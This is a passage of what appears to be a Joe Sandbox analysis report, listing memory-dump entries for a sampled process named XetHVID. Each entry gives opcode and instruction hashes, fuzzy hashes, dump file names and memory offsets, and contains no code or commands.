                                                                  • Instruction ID: 7077a6c6f91225fc2bc11941e08d0414a229323d4b8801a8af6a4d08bad075af
                                                                  • Opcode Fuzzy Hash: 6fdc9bf854c7c05d62c771e19fc76b412d41dc2cb7d0021bc891584b778b3e13
                                                                  • Instruction Fuzzy Hash: F931F6F4E1020EDFDB40DFA8D9915EEBBF5EF88310F104469E609E7650EB309A548BA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4fa944ff9dfe0154786c3874e41c6be363d5fcc78bfd77f59d6deca12beac73
                                                                  • Instruction ID: ceecddcaf5bf4a42ca446d8d5557f5696b24f07bad33b77c7be9c71d3e17a3d9
                                                                  • Opcode Fuzzy Hash: a4fa944ff9dfe0154786c3874e41c6be363d5fcc78bfd77f59d6deca12beac73
                                                                  • Instruction Fuzzy Hash: 3E31DFF0604108CFE700DF58D4A27AAB7F5EB86318F14C45ED15E9B782CB369D468BA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb0a710615401a0ee1c92a3d797df8840e06ea2f898f9b65fee47fb4a6f13159
                                                                  • Instruction ID: b1aebf9040fab850273f51e7a657d1b34584a080ae515502b78d7feafeec2b2e
                                                                  • Opcode Fuzzy Hash: cb0a710615401a0ee1c92a3d797df8840e06ea2f898f9b65fee47fb4a6f13159
                                                                  • Instruction Fuzzy Hash: B72138367106108FEF24CA64C4826BEBBF2EB85215B18807AD646C3395C634EE46C761
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39a45f48b966e52cae0745245127832e574a36dea04227c32958b64a13d647a6
                                                                  • Instruction ID: 0c6411f875f608430f17a7ee22dff6047f46a7220ebbb4c310fa78d816418d39
                                                                  • Opcode Fuzzy Hash: 39a45f48b966e52cae0745245127832e574a36dea04227c32958b64a13d647a6
                                                                  • Instruction Fuzzy Hash: 71218071F001555BCB10DBAAC905ABFBFFAAFC5300F14856AE414D3250EB718E41CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2cd0c9696d2f4d42691266e3434ae621a32ee9ea0ef942e0deffe80a7ef87c0
                                                                  • Instruction ID: 38e015b043153aa0ddcc95ce25b05f6183b87838d353c4180b928d3fb014063b
                                                                  • Opcode Fuzzy Hash: d2cd0c9696d2f4d42691266e3434ae621a32ee9ea0ef942e0deffe80a7ef87c0
                                                                  • Instruction Fuzzy Hash: 9E21F970E00225C7DB55BB75C4841EEFB70EF41316F11497AC64A6B346FA31D9258FA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b219032f85b81602ca40905b41e6ac0995c147f3f30910e456412debff34ded9
                                                                  • Instruction ID: 19d84f0b35fa6a45fe870a07cb6e841824043f9fae3d948486fad3edc1b3c66d
                                                                  • Opcode Fuzzy Hash: b219032f85b81602ca40905b41e6ac0995c147f3f30910e456412debff34ded9
                                                                  • Instruction Fuzzy Hash: B631DFF0614118CFE700DF58C4927AAB7B5EB86314F14C86ED15EDBB82CB369D468BA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d60f8693e4d3b65e5757f8fcf4ed1156e66797cec430222fa29ef4a35fc240a0
                                                                  • Instruction ID: 3fcd5384182a2612fd322406b44b9a683613334e545054612c92380f3cd9afbb
                                                                  • Opcode Fuzzy Hash: d60f8693e4d3b65e5757f8fcf4ed1156e66797cec430222fa29ef4a35fc240a0
                                                                  • Instruction Fuzzy Hash: A6318C71A112298FDB44DFA8C854ADDBBF2BF88305F15406AD505FB361DB759901CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16f43f220af0a05342c964d96dd597252d8df57c494a3adf01f656a5b0c05951
                                                                  • Instruction ID: 4a38b93f70111d6e97aee4496709d0b1ea3b6e1597298121127757d182568fe3
                                                                  • Opcode Fuzzy Hash: 16f43f220af0a05342c964d96dd597252d8df57c494a3adf01f656a5b0c05951
                                                                  • Instruction Fuzzy Hash: 01310F32D10B0ADECB01AFB8D844899FBB1FF95354B118B59E95967221EB30E695CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 998123c4baa145717321133fe14bf43871cd3d01f8ba9ffa5538938d0dedeabd
                                                                  • Instruction ID: 2673a7347c344cf32639b9a9e958776135863d7e5982f88de001df338bdf1c75
                                                                  • Opcode Fuzzy Hash: 998123c4baa145717321133fe14bf43871cd3d01f8ba9ffa5538938d0dedeabd
                                                                  • Instruction Fuzzy Hash: 6721D7367106108FEF24DA65C481A7EBBF6EBC4225B18803AD646D3795CA34E986C761
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4126dd03d138527a97e10efc20f4a2d3f7d234088014e6f23f8650f49a3f188d
                                                                  • Instruction ID: 6ad67bb0cd180045661be176e656cd6f195df15d1daea680cf4f9158154f2e87
                                                                  • Opcode Fuzzy Hash: 4126dd03d138527a97e10efc20f4a2d3f7d234088014e6f23f8650f49a3f188d
                                                                  • Instruction Fuzzy Hash: 23315735A10649DFCB05EFA8C4548EDBBB5FF89300F01869AD5056B225FB70A989CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23d029840c6cce03e3185cd82689f031d4c999ab114fef049ed99e037eea78c6
                                                                  • Instruction ID: 8e272c991339e0f56d195d5d94e0d24225ae1da444e554ef9fcac9bc5fea1a9f
                                                                  • Opcode Fuzzy Hash: 23d029840c6cce03e3185cd82689f031d4c999ab114fef049ed99e037eea78c6
                                                                  • Instruction Fuzzy Hash: 7031F635A10209EFDB01AFA4E98899EBFB6FF89300F444516F502AB365DF319845CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d9b53fb2e6d714311f354bdcc73cb8b2aaf4aba5817525d8058c853be792ce1a
                                                                  • Instruction ID: 30ceb7a456976d6a2720cd2f1558a2d0883ccc525d5b7e66b77ed52403a94a0e
                                                                  • Opcode Fuzzy Hash: d9b53fb2e6d714311f354bdcc73cb8b2aaf4aba5817525d8058c853be792ce1a
                                                                  • Instruction Fuzzy Hash: E831F135A10609DFCB04EFA8D894CDDFBB5FF89310F01865AE5056B224FB70A989CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 48b9b6f82f2912757ef8690197f69177f85624858d414671494996bcd76fb15c
                                                                  • Instruction ID: 2caf78699553f6d72adfb5653d6c650c39daaba7727247a5b08ed4c571ad4c06
                                                                  • Opcode Fuzzy Hash: 48b9b6f82f2912757ef8690197f69177f85624858d414671494996bcd76fb15c
                                                                  • Instruction Fuzzy Hash: 0A21D2F1A1530BCFEB25DB60D61566E7BBAEF46201F1840ADD40AD6242CA34CC01EB52
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58de58205f660be9afa132a2059a0b35ec5b8b7e57eaa4355b69666cd071bf50
                                                                  • Instruction ID: 1cf8c52d7098ff1445cce79741b44a187bf4a8582ba725c39ff148030d06c643
                                                                  • Opcode Fuzzy Hash: 58de58205f660be9afa132a2059a0b35ec5b8b7e57eaa4355b69666cd071bf50
                                                                  • Instruction Fuzzy Hash: 1A218BB9710112CFEB20EBA4E949AAFBBF4FB48365F044029E41D87640DF30D956CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8e64f2131d24a2038d9eaad3dd51bcee18f84d6dcd9a839405cdeee3700c9953
                                                                  • Instruction ID: 63cfb4693388281b0abd4e980f68d60290976e4686a5f88defaa254e963c1694
                                                                  • Opcode Fuzzy Hash: 8e64f2131d24a2038d9eaad3dd51bcee18f84d6dcd9a839405cdeee3700c9953
                                                                  • Instruction Fuzzy Hash: 7A216231F007198FDB41EF78C5486ADB7B5EF89311F00426AE519E7361EB309A46CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fa0d953e88799265fe7859be2e304609533788b3a9c9ae01ad42c0dc28bd1974
                                                                  • Instruction ID: 0d38b0ec47609ab3aa3203d82a0f3b7c6786178a8c6bbea176a9d15c3f10eda2
                                                                  • Opcode Fuzzy Hash: fa0d953e88799265fe7859be2e304609533788b3a9c9ae01ad42c0dc28bd1974
                                                                  • Instruction Fuzzy Hash: 0B21F935A10219EFCB05AFA4D88899EBBB6FF89304F404516F502AB364DF316945CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 291cb95b7a602c4edf992143b6082bdacd3ca3a8d577936708e512ee2fd52529
                                                                  • Instruction ID: 9014818f45d0d4a7cb5d0f6cdef809231f5e628947009b0f7cdd2f93ca60e8e8
                                                                  • Opcode Fuzzy Hash: 291cb95b7a602c4edf992143b6082bdacd3ca3a8d577936708e512ee2fd52529
                                                                  • Instruction Fuzzy Hash: 8D312F32D10B0ADECB01AFB8D844899FB71FF95340B118B5AE95927221FB30E695CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 37629d1b9ae8eddd835d0e4e93049dc5c4e242a79eea2d5915347ecde14ee99a
                                                                  • Instruction ID: fac6cd86fb40647eb72c20e21ab59a46ba1c238de256759b12461266deeaac9a
                                                                  • Opcode Fuzzy Hash: 37629d1b9ae8eddd835d0e4e93049dc5c4e242a79eea2d5915347ecde14ee99a
                                                                  • Instruction Fuzzy Hash: 54215AF4E04209DFDF40DFB8D4926EEBBF5AF48310F10446AE509E7640EB349A448BA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7343d51c086e2e2d01f7250ab8326679a8741af3dbfe04ae2b08570a9f2d038e
                                                                  • Instruction ID: 41332f59d3a832bbf3ad69e9b5e19a0c4913939c375208f383239a7dccb347a6
                                                                  • Opcode Fuzzy Hash: 7343d51c086e2e2d01f7250ab8326679a8741af3dbfe04ae2b08570a9f2d038e
                                                                  • Instruction Fuzzy Hash: 5321B0303003118BD769AB75985492AB7F6AFC5206B54487DCA46CB796EF31EC06C760
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 352ce9205e129a1b24c75d0e1a1f87caf2ee812b545cb0802c258c0eee49fa58
                                                                  • Instruction ID: 7f101466d163458748c1b419b09eecb3e79f8c467202c665b959c851b0de8c9d
                                                                  • Opcode Fuzzy Hash: 352ce9205e129a1b24c75d0e1a1f87caf2ee812b545cb0802c258c0eee49fa58
                                                                  • Instruction Fuzzy Hash: 7721CF76E0021A9BDF04DFA9C980AEEB7F6FF98340F54442AD405E7250EB349A01CBB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1722105506.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d9d000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd0d92218b874f9df9dca409ae7990f7c718ae4fb3ce8082989e3202f347325e
                                                                  • Instruction ID: 6ff41d8ccef00d16bc5460f2ecfb3abcdb57a32792d964572fd4028697d3d44b
                                                                  • Opcode Fuzzy Hash: dd0d92218b874f9df9dca409ae7990f7c718ae4fb3ce8082989e3202f347325e
                                                                  • Instruction Fuzzy Hash: B321F275604300AFCF05DF14C9C4B26BBA6FB94314F24C96DE84A4B292C336D806CA71
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1722105506.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d9d000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae4d9b99069d12c127b5a67cd69d4d389136343a59a5afa502d68ee7f471bf2c
                                                                  • Instruction ID: 0db95a718fca0a41ca6294041646cd8f7c3bf463fe7da07d933febd65f8539ac
                                                                  • Opcode Fuzzy Hash: ae4d9b99069d12c127b5a67cd69d4d389136343a59a5afa502d68ee7f471bf2c
                                                                  • Instruction Fuzzy Hash: 6B212271604204DFCF00DF14D9C4B26BBA6FB94325F24C66DE80A4B282C33AE846CA72
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 63a304e001c9100b8761f4426d880e58e65f1d400b8a0aa217e2f33fdab3b100
                                                                  • Instruction ID: bcdd2ddb6f80f5857f6448e5f37e33a55fe2fd77e170ff17688908de129e18a6
                                                                  • Opcode Fuzzy Hash: 63a304e001c9100b8761f4426d880e58e65f1d400b8a0aa217e2f33fdab3b100
                                                                  • Instruction Fuzzy Hash: 7A218C74A00246DFDB41DFB8C484A6E7FB1AB89211F054479E905DB362D731EC81CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8bc29d64fbe103427ea92c58e025aeee2ac24b91db446f0c1f10954e1790d89
                                                                  • Instruction ID: 6344073fff4d5df9206ec4d207719f581278c8677296b91264f68a4ad73a6802
                                                                  • Opcode Fuzzy Hash: d8bc29d64fbe103427ea92c58e025aeee2ac24b91db446f0c1f10954e1790d89
                                                                  • Instruction Fuzzy Hash: 04211275A1020A8FCF44EF69C8849AEB7B5FF89300B518569D909B7355EB30AD45CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7aa341776223cdf8e3e5efe483495478e96b2b768377403659cdef56abae1009
                                                                  • Instruction ID: 810575e351e2bd62af749cf33045bc6087cac326162ef0d7b6796e32af99e126
                                                                  • Opcode Fuzzy Hash: 7aa341776223cdf8e3e5efe483495478e96b2b768377403659cdef56abae1009
                                                                  • Instruction Fuzzy Hash: 961122343002211FEB04676CD852B6E76E7DBC5B18F40402AE906D77D5CDBAEC4187E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 999b4a96cefc356e57639f63074d544ecb5df8776939aa2f0cbd1cd9ea5ba51c
                                                                  • Instruction ID: 2048b59569e9e37049a44055f5bc20ae93f8aed5544eb409e30a73683bdfa271
                                                                  • Opcode Fuzzy Hash: 999b4a96cefc356e57639f63074d544ecb5df8776939aa2f0cbd1cd9ea5ba51c
                                                                  • Instruction Fuzzy Hash: 502165F1E38515C7F311CA6AC440679B3A9AB4A310F01A15FA31ECAA90C774ED908B76
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f999395110207b7b964f317b75630d1556b515736adc9e97cf24f02a480534c3
                                                                  • Instruction ID: c6871b7fd6f2d97d9897730808a09048d267feb62845cd8c20e04d6e58c25842
                                                                  • Opcode Fuzzy Hash: f999395110207b7b964f317b75630d1556b515736adc9e97cf24f02a480534c3
                                                                  • Instruction Fuzzy Hash: D7216DB5B112058FDF44DF68C8848AEBBB5FF88200B40457AD90AE7351EB30AD05CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 966f4d5145d9f002168427f8660da638c50248dfe725575d7f7d5e22f64dca21
                                                                  • Instruction ID: a411e2ed44f488d650f10fcc11db8f518632955a3a567efcad76e9d92080b695
                                                                  • Opcode Fuzzy Hash: 966f4d5145d9f002168427f8660da638c50248dfe725575d7f7d5e22f64dca21
                                                                  • Instruction Fuzzy Hash: 0C11C4343002215FEB04B76DD852B6E76E7EBC5B28F00442AE506D77D5CDB5EC4187A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f33cba2eb5b5bca899a1f9b36b78f9dd77b41ec87bfa5a0b3d76e8e58e71840
                                                                  • Instruction ID: 9e9bfb11de0d4064f3315ac894ef22f430ab93d317954a38e62ed3a7eb6d7cb1
                                                                  • Opcode Fuzzy Hash: 5f33cba2eb5b5bca899a1f9b36b78f9dd77b41ec87bfa5a0b3d76e8e58e71840
                                                                  • Instruction Fuzzy Hash: 4D218E30910649CFDB15EF68C8556EEBBF1EF4A305F00852DD546BB250EB30A948DBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ce0c56a20aed4c86da6ba211480ac171e25a8edf4a969f6ddc92afac276a6a5
                                                                  • Instruction ID: f83f104a5cf9d79f9d0311c8362da38d69184c7c9d19d3383ee62f4a892bbe0f
                                                                  • Opcode Fuzzy Hash: 3ce0c56a20aed4c86da6ba211480ac171e25a8edf4a969f6ddc92afac276a6a5
                                                                  • Instruction Fuzzy Hash: 312104F0A1930ADFEB24CB64C6147AD7BB6EF46311F24406DD40AE7692CB358D01DB52
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a88c7caaec035b143989955a2d18844a81ce914c0bcc04cd9d2d125ede638111
                                                                  • Instruction ID: ccc8919802b2097ea52a66027c58fa1da0159fa646031ce286b86e55085abac9
                                                                  • Opcode Fuzzy Hash: a88c7caaec035b143989955a2d18844a81ce914c0bcc04cd9d2d125ede638111
                                                                  • Instruction Fuzzy Hash: AF2175F5E1112A8BDB00DFA8C5506EEBBBAFF89301F508525D1097B351DB306E46CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fabfaf8e4e9c3bdcf3394f90489b8159d8ffa866b048059cfeeb63088bd7972a
                                                                  • Instruction ID: b7a1a216088bea732e5d3bcaba6b711ef707a69614ace460b49479953b7b6545
                                                                  • Opcode Fuzzy Hash: fabfaf8e4e9c3bdcf3394f90489b8159d8ffa866b048059cfeeb63088bd7972a
                                                                  • Instruction Fuzzy Hash: 4111C476F00116EFDB916A95E9441EEFFB4EB40346F604C75D68DF2245E2308A318F94
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7725047d1a56d93f096568d3e48aea5c6eb949234d461c8b8bc1095f65cc1b1
                                                                  • Instruction ID: eb3a54ce339ce886728739c802989a33bd54eb6d5494bfefed0b74f0515b15f3
                                                                  • Opcode Fuzzy Hash: a7725047d1a56d93f096568d3e48aea5c6eb949234d461c8b8bc1095f65cc1b1
                                                                  • Instruction Fuzzy Hash: 78112571B083502FC715DBBD98605AFBFFA8F85210F0544ABE909DB782EA249C0683F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 88409c7039e670efc59abfed34477280f096813162b7ef3dbd38e5c116a64265
                                                                  • Instruction ID: 733c61ef40341545274e2dd35f54fd47f425c52aead0c978c18049bb37e7782b
                                                                  • Opcode Fuzzy Hash: 88409c7039e670efc59abfed34477280f096813162b7ef3dbd38e5c116a64265
                                                                  • Instruction Fuzzy Hash: E41129353142918FD7528728C8585AE3BE5DF8A21171940EBD149CF3B3CA24DC4787A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cac7fd324af9ae96b3c3a5a79850a7e19ca052d334ccdb836328c1b692455e09
                                                                  • Instruction ID: b3f9d366674cde1368ae07cc211bd459a79326b353eb8bb23dea1c6faf353530
                                                                  • Opcode Fuzzy Hash: cac7fd324af9ae96b3c3a5a79850a7e19ca052d334ccdb836328c1b692455e09
                                                                  • Instruction Fuzzy Hash: FB1159B13103019FEB54DFA8E481A6B7BA6FBC9311F948529E80DCB355DF359C428B61
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
